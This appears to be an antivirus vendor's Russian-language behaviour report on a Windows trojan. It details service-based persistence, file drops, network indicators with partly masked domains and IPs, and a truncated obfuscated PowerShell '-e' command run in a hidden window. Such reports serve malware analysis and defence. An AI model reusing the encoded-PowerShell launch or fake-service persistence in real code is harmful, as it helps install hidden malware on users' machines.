Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\iasacct] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\iasacct] 'ImagePath' = '"%WINDIR%\SysWOW64\kbd106n\iasacct.exe"'
Создает следующие сервисы
- 'iasacct' "%WINDIR%\SysWOW64\kbd106n\iasacct.exe"
- 'iasacct' %WINDIR%\SysWOW64\kbd106n\iasacct.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEwAWQBFAFYAbAB6AGcAPQAnAFUAWQBWAFEAWQBtAGMAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBgAFUAcgBpAFQAYABZAHAAUgBvAGAAVABgAE8AYwBPAEwAIgAgAD...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\222.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\kbd106n\iasacct.exe
Перемещает следующие файлы
- %HOMEPATH%\222.exe в %WINDIR%\syswow64\kbd106n\iasacct.exe
Сетевая активность
Подключается к
- '78.##9.60.109':443
TCP
Запросы HTTP GET
- http://pa###ncheta.com/breezes/wwlew3341719/
- http://www.pa###ncheta.com/breezes/wwlew3341719/
- http://nu##gi.com/old/qzbCEKop/
Запросы HTTP POST
- http://78.###.60.109:443/oizs7nSAcpARF/mtcXSS/v1h8/ZO90CP/Zefi64aMzn2aTYiBlc/ejSUOo9B5/ via 78.##9.60.109
UDP
- DNS ASK lg##ss.com
- DNS ASK pa###ncheta.com
- DNS ASK nu##gi.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\222.exe'
- '%WINDIR%\syswow64\kbd106n\iasacct.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEwAWQBFAFYAbAB6AGcAPQAnAFUAWQBWAFEAWQBtAGMAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBgAFUAcgBpAFQAYABZAHAAUgBvAGAAVABgAE8AYwBPAEwAIgAgAD...' (со скрытым окном)
